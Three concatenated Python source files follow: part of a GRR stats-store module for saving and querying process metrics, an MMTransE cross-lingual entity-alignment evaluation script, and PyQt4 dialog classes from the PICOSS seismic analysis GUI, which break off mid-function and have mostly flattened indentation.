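#   store = aff4.FACTORY.Create(None, StatsStore, mode="w", token=token)
#   store.WriteStats(process_id="worker")
#   stats_data = store.ReadStats(process_id="worker")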
class StatsStoreProcessData(aff4.AFF4Object):
"""Stores stats data for a particular process."""
class SchemaCls(aff4.AFF4Object.SchemaCls):
"""Schema for StatsStoreProcessData."""
METRICS_METADATA = aff4.Attribute(
"aff4:stats_store_process_data/metrics_metadata",
stats_values.StatsStoreMetricsMetadata,
creates_new_object_version=False,
versioned=False)
def WriteMetadataDescriptors(self, metrics_metadata, timestamp=None):
current_metadata = self.Get(
self.Schema.METRICS_METADATA,
default=stats_values.StatsStoreMetricsMetadata())
if current_metadata.AsDict() != metrics_metadata:
store_metadata = stats_values.StatsStoreMetricsMetadata(
metrics=metrics_metadata.values())
self.AddAttribute(
self.Schema.METRICS_METADATA, store_metadata, age=timestamp)
self.Flush()
def WriteStats(self, timestamp=None):
metrics_metadata = stats.STATS.GetAllMetricsMetadata()
self.WriteMetadataDescriptors(metrics_metadata, timestamp=timestamp)
with data_store.DB.GetMutationPool() as mutation_pool:
mutation_pool.StatsWriteMetrics(
self.urn, metrics_metadata, timestamp=timestamp)
def DeleteStats(self, timestamp=data_store.DataStore.ALL_TIMESTAMPS):
"""Deletes all stats in the given time range."""
with data_store.DB.GetMutationPool() as mutation_pool:
mutation_pool.StatsDeleteStatsInRange(self.urn, timestamp)
class StatsStore(aff4.AFF4Volume):
"""Implementation of the long-term storage of collected stats data.
  This class allows writing current stats data to the data store, as well as
  reading and deleting them. StatsStore uses data_store to store the data.
All historical stats data are stored in a single data store subject per
process. By process we mean, for example: "admin UI", "worker #1",
"worker #3", etc. Stats data are stored as subject's attributes.
"""
DATA_STORE_ROOT = rdfvalue.RDFURN("aff4:/stats_store")
ALL_TIMESTAMPS = data_store.DataStore.ALL_TIMESTAMPS
NEWEST_TIMESTAMP = data_store.DataStore.NEWEST_TIMESTAMP
def Initialize(self):
super(StatsStore, self).Initialize()
if self.urn is None:
self.urn = self.DATA_STORE_ROOT
def WriteStats(self, process_id=None, timestamp=None):
"""Writes current stats values to the data store with a given timestamp."""
if not process_id:
raise ValueError("process_id can't be None")
process_data = aff4.FACTORY.Create(
self.urn.Add(process_id),
StatsStoreProcessData,
mode="rw",
token=self.token)
process_data.WriteStats(timestamp=timestamp)
def ListUsedProcessIds(self):
"""List process ids that were used when saving data to stats store."""
return [urn.Basename() for urn in self.ListChildren()]
def ReadMetadata(self, process_id=None):
"""Reads metadata of stored values for the given process."""
if not process_id:
raise ValueError("process_id can't be None")
results = self.MultiReadMetadata(process_ids=[process_id])
try:
return results[process_id]
except KeyError:
return {}
def MultiReadMetadata(self, process_ids=None):
"""Reads metadata of stored values for multiple given processes."""
if not process_ids:
process_ids = self.ListUsedProcessIds()
subjects = [
self.DATA_STORE_ROOT.Add(process_id) for process_id in process_ids
]
subjects_data = aff4.FACTORY.MultiOpen(
subjects, mode="r", token=self.token, aff4_type=StatsStoreProcessData)
results = {}
for subject_data in subjects_data:
results[subject_data.urn.Basename()] = subject_data.Get(
subject_data.Schema.METRICS_METADATA)
for process_id in process_ids:
results.setdefault(process_id, stats_values.StatsStoreMetricsMetadata())
return results
def ReadStats(self,
process_id=None,
metric_name=None,
timestamp=ALL_TIMESTAMPS,
limit=10000):
"""Reads stats values from the data store for the current process."""
if not process_id:
raise ValueError("process_id can't be None")
results = self.MultiReadStats(
process_ids=[process_id],
metric_name=metric_name,
timestamp=timestamp,
limit=limit)
try:
return results[process_id]
except KeyError:
return {}
def MultiReadStats(self,
process_ids=None,
metric_name=None,
timestamp=ALL_TIMESTAMPS,
limit=10000):
"""Reads historical data for multiple process ids at once."""
if not process_ids:
process_ids = self.ListUsedProcessIds()
multi_metadata = self.MultiReadMetadata(process_ids=process_ids)
subjects = [
self.DATA_STORE_ROOT.Add(process_id) for process_id in process_ids
]
return data_store.DB.StatsReadDataForProcesses(
subjects, metric_name, multi_metadata, timestamp=timestamp, limit=limit)
def DeleteStats(self, process_id=None, timestamp=ALL_TIMESTAMPS):
"""Deletes all stats in the given time range."""
if not process_id:
raise ValueError("process_id can't be None")
process_data = aff4.FACTORY.Create(
self.urn.Add(process_id),
StatsStoreProcessData,
mode="w",
token=self.token)
process_data.DeleteStats(timestamp=timestamp)
class StatsStoreDataQuery(object):
"""Query class used to results from StatsStore.ReadStats/MultiReadStats.
NOTE: this class is mutable. Although it's designed with call-chaining in
mind, you have to create new query object for every new query.
I.e. - this *will not* work:
query = stats_store.StatsStoreDataQuery(stats_data)
counter1 = query.In("pid1").In("counter").SeriesCount()
counter2 = query.In("pidw").In("counter").SeriesCount()
But this *will* work:
query = stats_store.StatsStoreDataQuery(stats_data)
counter1 = query.In("pid1").In("counter").SeriesCount()
query = stats_store.StatsStoreDataQuery(stats_data)
counter2 = query.In("pidw").In("counter").SeriesCount()
"""
VALUE_QUERY = "value"
DISTRIBUTION_SUM_QUERY = "distribution_sum"
DISTRIBUTION_COUNT_QUERY = "distribution_count"
def __init__(self, stats_data):
super(StatsStoreDataQuery, self).__init__()
self.current_dicts = [stats_data]
self.time_series = None
self.path = []
self.query_type = None
self.aggregate_via = None
self.sample_interval = None
def _TimeSeriesFromData(self, data, attr=None):
"""Build time series from StatsStore data."""
series = timeseries.Timeseries()
for value, timestamp in data:
if attr:
try:
series.Append(getattr(value, attr), timestamp)
except AttributeError:
raise ValueError("Can't find attribute %s in value %s." % (attr,
value))
else:
if hasattr(value, "sum") or hasattr(value, "count"):
raise ValueError(
"Can't treat complext type as simple value: %s" % value)
series.Append(value, timestamp)
return series
@property
def ts(self):
"""Return single timeseries.Timeseries built by this query."""
if self.time_series is None:
raise RuntimeError("Time series weren't built yet.")
if not self.time_series:
return timeseries.Timeseries()
return self.time_series[0]
def In(self, regex):
"""Narrow query's scope."""
self.path.append(regex)
new_current_dicts = []
for current_dict in self.current_dicts:
for key, value in current_dict.iteritems():
m = re.match(regex, key)
if m and m.string == m.group(0):
new_current_dicts.append(value)
self.current_dicts = new_current_dicts
return self
def _GetNestedValues(self, dicts):
"""Get all values nested in the given dictionaries.
Args:
dicts: List of dictionaries to go through.
Returns:
([nested values], status) where status is True if nested values are
dictionaries and False otherwise.
Raises:
RuntimeError: if some nested values are dictionaries and some are not.
"""
new_dicts = []
for current_dict in dicts:
for _, value in current_dict.iteritems():
new_dicts.append(value)
sub_dicts = [x for x in new_dicts if hasattr(x, "iteritems")]
if not sub_dicts:
return (new_dicts, False)
elif len(sub_dicts) == len(new_dicts):
return (new_dicts, True)
else:
raise RuntimeError("Inconsistent values hierarchy.")
def InAll(self):
"""Use all metrics in the current scope."""
self.path.append(":all")
while True:
self.current_dicts, status = self._GetNestedValues(self.current_dicts)
if not status:
break
return self
def MakeIncreasing(self):
"""Fixes the time series so that it does not decrement."""
if self.time_series is None:
raise RuntimeError("MakeIncreasing must be called after Take*().")
for time_serie in self.time_series:
time_serie.MakeIncreasing()
return self
def Normalize(self, period, start_time, stop_time, **kwargs):
"""Resample the query with given sampling interval."""
if self.time_series is None:
raise RuntimeError("Normalize must be called after Take*().")
self.sample_interval = period
self.start_time = start_time
self.stop_time = stop_time
for time_serie in self.time_series:
time_serie.Normalize(period, start_time, stop_time, **kwargs)
return self
def InTimeRange(self, range_start, range_end):
"""Only use data points withing given time range."""
if self.time_series is None:
raise RuntimeError("InTimeRange must be called after Take*().")
if range_start is None:
raise ValueError("range_start can't be None")
if range_end is None:
raise ValueError("range_end can't be None")
for time_serie in self.time_series:
time_serie.FilterRange(start_time=range_start, stop_time=range_end)
return self
def TakeValue(self):
"""Assume metrics in this query are plain values."""
self.query_type = self.VALUE_QUERY
self.time_series = []
for current_dict in self.current_dicts:
self.time_series.append(self._TimeSeriesFromData(current_dict))
return self
def TakeDistributionSum(self):
"""Assume metrics in this query are distributions. Use their sums."""
self.query_type = self.DISTRIBUTION_SUM_QUERY
self.time_series = []
for current_dict in self.current_dicts:
self.time_series.append(self._TimeSeriesFromData(current_dict, "sum"))
return self
def TakeDistributionCount(self):
"""Assume metrics in this query are distributions. Use their counts."""
self.query_type = self.DISTRIBUTION_COUNT_QUERY
self.time_series = []
for current_dict in self.current_dicts:
self.time_series.append(self._TimeSeriesFromData(current_dict, "count"))
return self
def AggregateViaSum(self):
"""Aggregate multiple time series into one by summing them."""
if self.time_series is None:
raise RuntimeError("AggregateViaSum must be called after Take*().")
if self.sample_interval is None:
raise RuntimeError("Resample() must be called prior to "
"AggregateViaSum().")
if not self.time_series:
return self
if len(self.time_series) == 1:
return self
current_serie = self.time_series[0]
for serie in self.time_series[1:]:
current_serie.Add(serie)
self.time_series = [current_serie]
return self
def AggregateViaMean(self):
"""Aggregate multiple time series into one by calculating mean value."""
num_time_series = len(self.time_series)
self.AggregateViaSum()
self.ts.Rescale(1.0 / num_time_series)
return self
def SeriesCount(self):
"""Return number of time series the query was narrowed to."""
if not self.time_series:
if not self.current_dicts:
return 0
else:
return len(self.current_dicts)
else:
return len(self.time_series)
def Rate(self):
"""Apply rate function to all time series in this query."""
if self.time_series is None:
raise RuntimeError("Rate must be called after Take*().")
if self.sample_interval is None:
raise RuntimeError("Normalize() must be called prior to Rate().")
for time_serie in self.time_series:
time_serie.ToDeltas()
time_serie.Rescale(1.0 / self.sample_interval.seconds)
return self
def Scale(self, multiplier):
"""Scale value in all time series in this query."""
if self.time_series is None:
raise RuntimeError("Scale must be called after Take*().")
for time_serie in self.time_series:
time_serie.Rescale(multiplier)
return self
def Mean(self):
"""Calculate mean value of a single time serie in this query."""
if self.time_series is None:
raise RuntimeError("Mean must be called after Take*().")
if not self.time_series:
return 0
if len(self.time_series) != 1:
raise RuntimeError("Can only return mean for a single time serie.")
return self.time_series[0].Mean()
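# Example query chain (a sketch; the process id and metric name are
# hypothetical):
#
#   stats_data = STATS_STORE.ReadStats(process_id="worker")
#   query = StatsStoreDataQuery(stats_data)
#   rate_ts = (query.In("worker").In("my_counter").TakeValue()
#              .Normalize(sample_interval, start_time, stop_time)
#              .Rate().ts)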
# Global StatsStore object
STATS_STORE = None
class StatsStoreWorker(object):
"""StatsStoreWorker periodically dumps stats data into the stats store."""
def __init__(self,
stats_store,
process_id,
thread_name="grr_stats_saver",
sleep=None):
super(StatsStoreWorker, self).__init__()
self.stats_store = stats_store
self.process_id = process_id
self.thread_name = thread_name
self.sleep = sleep or config.CONFIG["StatsStore.write_interval"]
def _RunLoop(self):
while True:
logging.debug("Writing stats to stats store.")
try:
self.stats_store.WriteStats(process_id=self.process_id)
except Exception as e: # pylint: disable=broad-except
logging.exception("StatsStore exception caught during WriteStats(): %s",
e)
logging.debug("Removing old stats from stats store." "")
# Maximum time we keep stats store data is three days.
stats_store_ttl = 60 * 60 * 24 * 3
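      # Timestamps are microseconds since epoch, hence the 1e6 factor below.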
try:
now = rdfvalue.RDFDatetime.Now().AsMicrosecondsSinceEpoch()
self.stats_store.DeleteStats(
process_id=self.process_id,
timestamp=(0, now - stats_store_ttl * 1000000))
except Exception as e: # pylint: disable=broad-except
logging.exception(
"StatsStore exception caught during DeleteStats(): %s", e)
time.sleep(self.sleep)
def Run(self):
self.RunAsync().join()
def RunAsync(self):
self.running_thread = threading.Thread(
name=self.thread_name, target=self._RunLoop)
self.running_thread.daemon = True
self.running_thread.start()
return self.running_thread
class StatsStoreInit(registry.InitHook):
"""Hook that inits global STATS_STORE object and stats store worker."""
pre = [aff4.AFF4InitHook]
def RunOnce(self):
"""Initializes StatsStore and StatsStoreWorker."""
# SetUID is required to create and write to aff4:/stats_store
token = access_control.ACLToken(username="GRRStatsStore").SetUID()
global STATS_STORE
STATS_STORE = aff4.FACTORY.Create(None, StatsStore, mode="w", token=token)
try:
STATS_STORE.Flush()
except access_control.UnauthorizedAccess:
logging.info("Not writing aff4:/stats_store due to lack of permissions.")
# We don't need StatsStoreWorker if there's no StatsStore.process_id in
# the config.
stats_process_id = config.CONFIG["StatsStore.process_id"]
if not stats_process_id:
return
stats_store_worker = StatsStoreWorker(STATS_STORE, stats_process_id)
stats_store_worker.RunAsync()
|
test_MMTransE_lan_mapping_120k_fk.py
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../src/MMTransE'))
from MMTransE import MMTransE
import time
import multiprocessing
from multiprocessing import Process, Value, Lock, Manager, Array
import numpy as np
from numpy import linalg as LA
fmap = os.path.join(os.path.dirname(__file__), '../../data/WK3l-120k/en_de/en2de_fk_120k.csv')
fmap2 = os.path.join(os.path.dirname(__file__), '../../data/WK3l-120k/en_de/de2en_fk_120k.csv')
fmodel = os.path.join(os.path.dirname(__file__), '../../models/en_de/model_MMtransE_person_120k_ed.bin')
ofile1 = os.path.join(os.path.dirname(__file__), '../../results/P_test_en2de_score_MM_120k.txt')
ofile4 = os.path.join(os.path.dirname(__file__), '../../results/P_test_de2en_score_MM_120k.txt')
ef_map = {}
fe_map = {}
vocab_e = []
vocab_f = []
topK = 10
model = MMTransE()
model.load(fmodel)
def seem_hit(x, y):
for i in y:
if x.find(i) > -1 or i.find(x) > -1:
return True
return False
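# e.g. seem_hit('Berlin', ['Berlin (Stadt)']) is True via the substring test.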
for line in open(fmap):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_e.append(line[0])
    if ef_map.get(line[0]) is None:
ef_map[line[0]] = [line[1]]
else:
ef_map[line[0]].append(line[1])
for line in open(fmap2):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_f.append(line[0])
    if fe_map.get(line[1]) is None:
fe_map[line[1]] = [line[0]]
else:
fe_map[line[1]].append(line[0])
print "Loaded en_de de_en mappings."
#en:...
manager = Manager()
lock1 = Lock()
past_num = Value('i', 0, lock=True)
score = manager.list()  # store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
cpu_count = multiprocessing.cpu_count()
t0 = time.time()
def test(model, vocab, index, src_lan, tgt_lan, map, score, past_num):
while index.value < len(vocab):
id = index.value
index.value += 1
word = vocab[id]
if id % 100 == 0:
            print id, '/', len(vocab), ' time used ', time.time() - t0
print score
print rank.value
tgt = map.get(word)
cand = model.kNN_entity_name(word, src_lan, tgt_lan, topK)
cand = [x[0] for x in cand]
tmp_score = np.zeros(topK)
hit = False
last_i = 0
cur_rank = None
        if tgt is None:
continue
for i in range(len(cand)):
last_i = i
tmp_cand = cand[i]
            if not hit and seem_hit(tmp_cand, tgt):
                hit = True
            if hit:
                tmp_score[i] = 1.0
                if cur_rank is None:
                    cur_rank = i
while last_i < topK:
if hit:
tmp_score[last_i] = 1.0
last_i += 1
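        # Update the shared hit@k vector as a running mean over all processed
        # queries; past_num tracks how many were averaged so far.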
if len(score) == 0:
score.append(tmp_score)
else:
with lock1:
score[0] = (score[0] * past_num.value + tmp_score) / (past_num.value + 1.0)
past_num.value += 1
        if cur_rank is not None:
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
continue
tmp_dist = 2
vec_t = None
vec_s = model.entity_transfer_vec(word, src_lan, tgt_lan)
for tmp_vec in tgt:
tmp_vec_t = model.entity_vec(tmp_vec, tgt_lan)
if tmp_vec_t is None:
continue
cur_dist = LA.norm(tmp_vec_t - vec_s)
if cur_dist < tmp_dist:
tmp_dist = cur_dist
vec_t = tmp_vec_t
if vec_t is None:
continue
cur_rank = model.entity_rank(vec_s, vec_t, tgt_lan)
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
index = Value('i', 0, lock=True)
processes = [Process(target=test, args=(model, vocab_e, index, 'en', 'de', ef_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile1, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing en to de'
#de:...
manager = Manager()
past_num = Value('i', 0, lock=True)
score = manager.list()  # store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
index = Value('i', 0, lock=True)
processes = [Process(target=test, args=(model, vocab_f, index, 'de', 'en', fe_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile4, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing de to en'
|
picoss_func.py
|
import sys
sys.path.append('..')
import gc
import numpy as np
import obspy
import math
import multiprocessing
from obspy import UTCDateTime
import os
# Graphical Packages
from PyQt4 import QtGui, QtCore
from matplotlib.widgets import RectangleSelector
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
# Main PICOSS modules
import picoss_main
from menus import DialogFolder
from menus import DialogConnection
from menus import DialogComponents
from menus import DialogStations
from menus import DialogFiltering
from menus import DialogPickingFile
from menus import DialogSave
from menus import DialogTrigger
from menus import DialogAmpa
from menus import DialogFI
from menus import DialogLoadResults
import gui_functions
import utils
class WindowLoadFolder(QtGui.QMainWindow, DialogFolder.Ui_MainWindow):
""" This class handles the data loading from an input folder.
"""
def __init__(self, parent):
super(WindowLoadFolder, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.pushButton_4.clicked.connect(self.get_info)
self.pushButton_3.clicked.connect(self.load_isolated)
self.filename = None
self.job = None
self.sta_lta = False
def get_info(self):
"""Function to get the trace info"""
if self.filename is None:
self.parent().msg_box("Can not submit without a file!", "Choose one file")
elif self.filename is not None and self.sta_lta:
self.update_parent_fromText()
self.parent().plot_trigger()
self.close()
else:
# In case the file is chosen, we get the attributes we want
self.update_parent_fromText()
self.parent().plot_from_file()
self.close()
def update_parent_fromText(self):
self.parent().station = str(self.station_2.text())
self.parent().channel = str(self.channel_2.text())
self.parent().network = str(self.network_2.text())
self.parent().location = str(self.location_2.text())
self.parent().day_of_the_year = str(self.day_of_the_year.text())
self.parent().trace_loaded_filename = str(self.filename)
def autocomplete(self, string):
arr = string.split("/")[-1].split(".")
        if len(arr) >= 4:
self.network_2.setText(arr[0])
self.station_2.setText(arr[1])
self.channel_2.setText(arr[3])
self.day_of_the_year.setText(arr[-1])
def load_isolated(self):
self.filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.label_filename_2.setText(self.filename)
self.autocomplete(self.filename)
class WindowConnection(QtGui.QMainWindow, DialogConnection.Ui_MainWindow):
"""
    This class handles the connection with the data repositories and sends back the data to the main interface.
"""
def __init__(self, parent):
super(WindowConnection, self).__init__(parent)
self.setupUi(self)
self.requestbutton.clicked.connect(self.requestdata)
self.cnt = None
def select_client(self, client):
"""
        Function that creates the client for connectivity according to the user's input, and links it with the user's variables.
Args:
client: str
The type of client we want to connect with.
"""
if client == 'Earthworm':
from obspy.clients.earthworm import Client as EClient
self.cnt = EClient(self.ip_address, int(self.port))
elif client == 'Seedlink':
from obspy.clients.seedlink import Client as SClient
self.cnt = SClient(self.ip_address, int(self.port))
elif client == 'FDSN':
from obspy.clients.fdsn import Client as FClient
self.cnt = FClient(self.ip_address, self.port)
elif client == 'arclink':
from obspy.clients.arclink import Client as AClient
self.cnt = AClient(self.ip_address, int(self.port))
else:
from obspy.clients.iris import Client as IClient
self.cnt = IClient("IRIS")
def requestdata(self):
""" Native function to request data from the clients."""
        self.ip_address = str(self.ip_c.text())
        port_text = str(self.port_c.text())
        if self.ip_address == '' or port_text == '':
            gui_functions.msg_box("IP address or port seems empty", "Please, enter data correctly!")
            return
        self.port = int(port_text)
self.parent().network = str(self.network_c.text())
self.parent().station = str(self.station_c.text())
self.parent().channel = str(self.channel_c.text())
self.parent().location = str(self.location_c.text())
# self.parent().component = str(self.component_c.text())
# self.parent().trace_number = str(self.numtraceBox.value())
self.parent().start_data = UTCDateTime((self.startTime.dateTime().toPyDateTime()))
self.parent().end_data = UTCDateTime((self.endTime.dateTime().toPyDateTime()))
# request the data
self.select_client(str(self.comboServers.currentText()))
st = self.cnt.get_waveforms(self.parent().network, self.parent().station,
self.parent().location,
self.parent().channel,
self.parent().start_data,
self.parent().end_data)
# a test trace below for test. Remove on final versions.
# st = "9702-10-1441-50S.MVO_18_1" #this is only from test!!
self.parent().trace_loaded = st
self.parent().stream = st
self.close()
gc.collect()
self.parent().plot_from_server()
class WindowComponents(QtGui.QMainWindow, DialogComponents.Ui_MainWindow):
def __init__(self, parent):
super(WindowComponents, self).__init__(parent)
self.setupUi(self)
# Define the parent window
self.parentWindow = picoss_main.Ui_MainWindow
# Define the push buttons we want to use.
self.pushButton_3.clicked.connect(self.load_data)
self.pushfirst.clicked.connect(self.plot_comp)
# Define current x1 and x2, as zero.
self.current_x1, self.current_x2 = self.parent().x1, self.parent().x2
self.current_fm = self.parent().fm
# Define the labels for the text.
self.label_t0.setText(str(self.current_x1))
self.label_t1.setText(str(self.current_x2))
# Define the active components.
self.active_component = None
self.trace_component = None
self.filename_c = None
def load_data(self):
"""
        Function to load the component data from a given file, and link the loaded data with the active component.
"""
self.refresh()
self.filename_c = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.label_loaded.setText(self.filename_c)
self.active_component = obspy.read(self.filename_c)
self.process_component()
def process_component(self):
"""
Function to process, by filtering and merging, a loaded component of the trace.
Returns:
trace component with the numpy array loaded.
"""
filtered = self.active_component.filter("highpass", freq=self.parent().highpass_freq)
self.active_component = filtered.merge(method=0, fill_value='interpolate')
self.trace_component = self.active_component[0]
return self.trace_component
def select_from_component(self, t0, t1, fm):
"""
        Function that selects a specific time window in a given trace
Args:
t0 : int
The starting time of the trace
t1 : int
The end time of the trace
fm : float
The sampling frequency of the trace
        Returns:
            numpy.ndarray
                The selected part of the trace.
"""
trace_c = self.trace_component.data
timeScale = np.asarray([t0, t1]) * fm
return trace_c[int(timeScale[0]):int(timeScale[1])]
def plot_comp(self):
""" Function to plot the component, similar to the one in run_picos.py
        Additional functions and auxiliary code are appended via run_picos.py
"""
if (self.active_component is None) or (int(self.current_x2) == 0):
pass
else:
self.refresh()
portion = self.select_from_component(self.current_x1, self.current_x2, self.current_fm)
# canvas signal 1
timeVector = np.linspace(self.current_x1, self.current_x2, len(portion))
self.ax = self.figura_signal_1.add_subplot(111)
# discards the old graph
self.ax.cla()
self.ax.plot(timeVector, portion)
self.canvas_signal_1.draw()
self.ax1 = self.figura_fft_1.add_subplot(111)
self.ax1.cla()
self.ax1.specgram(portion.flatten(), NFFT=64, Fs=self.current_fm, noverlap=32, cmap='jet')
self.canvas_fft_1.draw()
def refresh(self):
self.current_x1 = self.parent().x1
self.current_x2 = self.parent().x2
self.label_t0.setText(str(self.current_x1))
self.label_t1.setText(str(self.current_x2))
class WindowStations(QtGui.QMainWindow, DialogStations.Ui_MainWindow):
"""
    Window that loads another station to visualize multiple components separately.
By loading another station in the program, we can see attenuation and similar
phenomena. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowStations, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
self.filename_c = ""
# This gets the position in the parent node to infer (approximately) where we are in the new one
self.current_x1 = self.parent().x1
self.current_x2 = self.parent().x2
self.delta_align = None
self.st1, self.st2, self.fm_s, self.hbf = 0, 0, 0, 0
self.axis_station = None
self.axis_specgram = None
self.station_stream = None
self.trace_stream = None
self.load_button.clicked.connect(self.load_data)
self.pushfirst.clicked.connect(self.plot)
self.pushButton.clicked.connect(self.refresh)
self.specgram_button.clicked.connect(self.specgram_plot)
self.checkBox_trace.clicked.connect(self.enable_params)
self.set_text_positions(self.current_x1, self.current_x2)
def set_text_positions(self, t0, t1):
self.label_start.setText(str(round(t0, 2)))
self.label_end.setText(str(round(t1, 2)))
def compute_delta_alignment(self):
time_main = self.parent().active_trace.stats.starttime
time_station = self.trace_stream.stats.starttime
return float(math.ceil(time_station - time_main))
def process_station(self, stream, fm_s, high_freq):
"""
Function to process the streams for any given station.
Any missing values are interpolated and filled with zeroes.
Args:
stream : Obspy.Stream object
The seismic data stream we want to process.
fm_s : float
The sampling frequency of the stream
high_freq : float
The default high frequency we want to work with
Returns:
numpy array containing the full trace.
"""
aux = stream.copy() # to avoid modification of the trace.
filtered = aux.filter("highpass", freq=high_freq)
merged = filtered.merge(method=0, fill_value='interpolate')
return merged[0]
def keyPressEvent(self, event):
"""
        Handle key press events. Keys that are not mapped to an available action are simply ignored.
Args:
event: QtGui.QKeyEvent
The type of event that has been clicked and selected.
"""
if type(event) == QtGui.QKeyEvent:
if event.key() == QtCore.Qt.Key_Z and self.axis_station:
self.axis_station.toolbar.zoom()
elif event.key() == QtCore.Qt.Key_S and self.axis_station:
self.axis_station.toolbar.pan()
elif event.key() == QtCore.Qt.Key_U and self.axis_station:
self.axis_station.toolbar.home()
elif event.key() == QtCore.Qt.Key_Q:
self.close()
else:
event.ignore()
def load_data(self):
"""Load the data from a folder"""
self.refresh()
self.filename_c = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.loaded_station_label.setText(self.filename_c)
self.station_stream = obspy.read(self.filename_c)
self.fm_s = self.station_stream[0].stats.sampling_rate
self.fm_newstation.setText(str(self.fm_s))
self.high_pass_fre.setText(str(0.5))
def plot(self):
self.refresh()
if self.parent().active_trace is None or self.filename_c == "":
pass
elif self.checkBox_trace.isChecked():
# get the filepath
filepath = str(self.loaded_station_label.text())
self.fm_s = float(self.fm_newstation.text())
self.hbf = float(self.high_pass_fre.text())
self.station_stream = obspy.read(filepath)
self.st1, self.st2 = 0, 0
self.clear_canvas()
else:
self.trace_stream = self.process_station(self.station_stream, self.fm_s, self.hbf)
self.delta_align = self.compute_delta_alignment()
time_Vector = np.linspace(0, len(self.trace_stream) / self.fm_s, num=len(self.trace_stream.data))
# create an axis
self.axis_station = self.figure_signal.add_subplot(111)
# discards the old graph
self.axis_station.cla()
self.axis_station.plot(time_Vector, self.trace_stream.data)
self.selector_station = RectangleSelector(self.axis_station, self.get_current_pos,
drawtype='box', useblit=True, button=[1],
minspanx=5, minspany=5, spancoords='pixels',
interactive=True)
self.axis_station.toolbar = NavigationToolbar(self.canvas_signal, self)
self.axis_station.axvline(self.current_x1, color='darkgreen', linestyle='solid')
self.axis_station.axvline(self.current_x2, color='green', linestyle='solid')
self.axis_station.axvline(self.delta_align + self.current_x1, color='orange', linestyle='dotted',
linewidth=2)
self.canvas_signal.draw()
gc.collect()
def get_current_pos(self, eclick, erelease):
self.st1 = eclick.xdata
self.st2 = erelease.xdata
def enable_params(self):
if self.checkBox_trace.isChecked():
self.fm_newstation.setEnabled(True)
self.high_pass_fre.setEnabled(True)
else:
self.fm_newstation.setEnabled(False)
self.high_pass_fre.setEnabled(False)
def refresh(self):
self.current_x1 = self.parent().x1
self.current_x2 = self.parent().x2
self.set_text_positions(self.current_x1, self.current_x2)
if self.axis_station:
            for _ in range(3):
                self.axis_station.lines[-1].remove()
self.axis_station.axvline(self.current_x1, color='darkgreen', linestyle='solid')
self.axis_station.axvline(self.current_x2, color='green', linestyle='solid')
self.axis_station.axvline(self.delta_align + self.current_x1, color='darkorange', linestyle='dotted',
linewidth=2)
self.canvas_signal.draw()
def reset(self, interactive):
"""Function to reset the controls and the main interface."""
if interactive and self.axis_station is not None:
mode = self.axis_station.get_navigate_mode()
if mode == "ZOOM":
self.axis_station.toolbar.zoom()
else:
self.axis_station.toolbar.pan()
def clear_canvas(self):
"clear the canvas and refres the variables."
self.figure_specgram.clf()
self.canvas_specgram.draw()
self.figure_signal.clf()
self.canvas_signal.draw()
self.refresh()
def specgram_plot(self):
"""Function to plot the spectrogram of the selected event."""
if self.axis_specgram is not None:
self.axis_specgram.cla()
if self.st1 <= 0:
pass
else:
valor = np.asarray([self.st1, self.st2]) * self.fm_s
chunkPlot = self.trace_stream.data[int(valor[0]):int(valor[1])]
self.axis_specgram = self.figure_specgram.add_subplot(111)
self.axis_specgram.cla()
self.axis_specgram.specgram(chunkPlot.flatten(), NFFT=64, Fs=self.fm_s, noverlap=32, cmap='jet')
self.canvas_specgram.draw()
class WindowFrequency(QtGui.QMainWindow, DialogFiltering.Ui_MainWindow):
def __init__(self, parent):
super(WindowFrequency, self).__init__(parent)
self.setupUi(self)
# get the sampling frequency of the parent node.
self.new_fm.setText(str(self.parent().fm))
# get the frequency of the default high frequency filter.
self.highpass_new.setText(str(self.parent().highpass_freq))
self.replot.clicked.connect(self.plot)
# get the name of the loaded trace.
self.filename_current_trace.setText(self.parent().trace_loaded_filename)
# high and low pass buttons.
self.button_bandpass.clicked.connect(self.enable_bandpass)
self.button_highpass.clicked.connect(self.enable_highpass)
def check_param(self, param):
"""Function to check if the input field is empty or not."""
if gui_functions.check_digits(param) and gui_functions.check_emptiness(param):
return True
else:
return False
def enable_bandpass(self):
"""Function to enable bandpass filtering to our data."""
self.bp_highfreq.setEnabled(True)
self.bp_downfreq.setEnabled(True)
self.highpass_new.setEnabled(False)
def enable_highpass(self):
"""Function to enable highpass filtering to our data."""
self.highpass_new.setEnabled(True)
self.bp_highfreq.setEnabled(False)
self.bp_downfreq.setEnabled(False)
def plot(self):
"""Function to plot the frequency options, and re-draw with the new interface options"""
self.parent().reset_interactive()
fm = str(self.new_fm.text())
freq_but = str(self.highpass_new.text())
# Check type of filters and apply to the ORIGINAL data.
if self.button_bandpass.isChecked() and self.check_param(fm):
freq_high = str(self.bp_highfreq.text())
freq_low = str(self.bp_downfreq.text())
if (self.check_param(freq_high) and self.check_param(freq_low)) \
and (float(freq_high) > float(freq_low)):
                # clean the parent node's figures and re-draw
self.parent().clean_figures()
self.parent().prepare_stream(bandpass=[float(freq_low), float(freq_high)])
self.close()
elif self.button_highpass.isChecked() and self.check_param(fm):
if self.check_param(fm) and self.check_param(freq_but):
self.parent().fm = float(fm)
self.parent().clean_figures()
